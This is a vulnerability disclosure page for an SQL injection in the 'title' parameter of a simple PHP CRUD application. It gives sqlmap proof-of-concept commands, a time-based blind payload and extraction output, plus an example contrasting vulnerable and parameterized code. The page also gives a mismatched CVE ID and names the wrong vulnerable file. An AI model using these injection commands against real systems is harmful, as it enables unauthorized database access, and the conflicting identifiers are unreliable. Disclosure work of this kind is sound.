CVE-2023-48078: GitHub - esasadam06/Simple-CRUD-Functionality-SQLi-POC

SQL Injection vulnerability in add.php in Simple CRUD Functionality v1.0 allows attackers to run arbitrary SQL commands via the ‘title’ parameter.



Simple-CRUD-Functionality-SQLi-POC - CVE-2023-48078

  • Exploit Author: esasadam06

Vendor Homepage

  • https://code-projects.org/simple-crud-functionality-in-php-with-source-code

Software Link

  • https://download.code-projects.org/details/8e863682-a839-4645-94e0-ae769c83635d

Overview

  • Simple CRUD Functionality SQLi POC is susceptible to a significant security vulnerability that arises from insufficient protection on the ‘title’ parameters in the hospitalLogin.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

Vulnerability Details

  • CVE ID: CVE-2023-46014
  • Affected Version: Simple CRUD Functionality V1.0
  • Vulnerable File: /add.php
  • Parameter Names: title
  • Attack Type: Local

References:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48078
  • https://nvd.nist.gov/vuln/detail/CVE-2023-48078

Description

  • The lack of proper input validation and sanitization on the ‘title’ parameters allows an attacker to craft SQL injection queries, gaining unauthorized access to the database.
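The weakness described above, shown as a concatenated INSERT beside its parameterized form. This is an added example, not the project's add.php (which this page does not show): the `notes` table and the `title`/`descr` fields come from the page, while the column layout, the function names and the use of in-memory SQLite in place of the application's MySQL database are assumptions.

```php
<?php
// Added example: NOT the project's add.php. Table 'notes' and the fields
// 'title'/'descr' come from the page; the column layout is assumed.
// SQLite in memory stands in for the application's MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE notes (id INTEGER PRIMARY KEY, title TEXT, descr TEXT)');

// Weak pattern: request values are concatenated into the statement text.
function addNoteConcat(PDO $db, string $title, string $descr): bool
{
    try {
        $db->exec("INSERT INTO notes (title, descr) VALUES ('$title', '$descr')");
        return true;
    } catch (PDOException $e) {
        // The quote in the input closed the string literal and changed the
        // statement. SQLite rejects the result; MySQL would parse and run it.
        return false;
    }
}

// Corrected pattern: placeholders keep the values out of the SQL grammar.
function addNotePrepared(PDO $db, string $title, string $descr): bool
{
    // Validation is defence in depth; binding is what stops the injection.
    if ($title === '' || strlen($title) > 255) {
        return false;
    }
    $stmt = $db->prepare('INSERT INTO notes (title, descr) VALUES (:title, :descr)');
    return $stmt->execute([':title' => $title, ':descr' => $descr]);
}

// The 'title' value sqlmap reported on this page, used as the test input.
$reported = "test' RLIKE SLEEP(5) AND 'FxIv'='FxIv";

$concatOk   = addNoteConcat($db, $reported, 'test');
$preparedOk = addNotePrepared($db, $reported, 'test');
$stored     = $db->query('SELECT title FROM notes')->fetchAll(PDO::FETCH_COLUMN);

printf("concatenated insert succeeded: %s\n", var_export($concatOk, true));
printf("prepared insert succeeded:     %s\n", var_export($preparedOk, true));
printf("rows stored: %d, title kept verbatim: %s\n",
    count($stored), var_export($stored === [$reported], true));
```

With bound parameters the reported value is stored as an ordinary title string, so a time-based probe such as the one in the PoC output has nothing to delay.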

Proof of Concept (PoC):

  • sqlmap -u 'http://localhost/CRUD-Operation/add.php' -p 'title' --data="title=test&descr=test&sub=" --risk=3 --level=3 --method='POST' -D 'crud'

    Parameter: title (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 RLIKE time-based blind
        Payload: title=test' RLIKE SLEEP(5) AND 'FxIv'='FxIv&descr=test&sub=

  • sqlmap -u 'http://localhost/CRUD-Operation/add.php' -p 'title' --data="title=test&descr=test&sub=" --risk=3 --level=3 --method='POST' -D 'crud' -T 'notes' --is-dba --current-user

    sqlmap resumed the following injection point(s) from stored session:

    Parameter: title (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 RLIKE time-based blind
        Payload: title=test' RLIKE SLEEP(5) AND 'FxIv'='FxIv&descr=test&sub=

    current user: 'root@localhost'
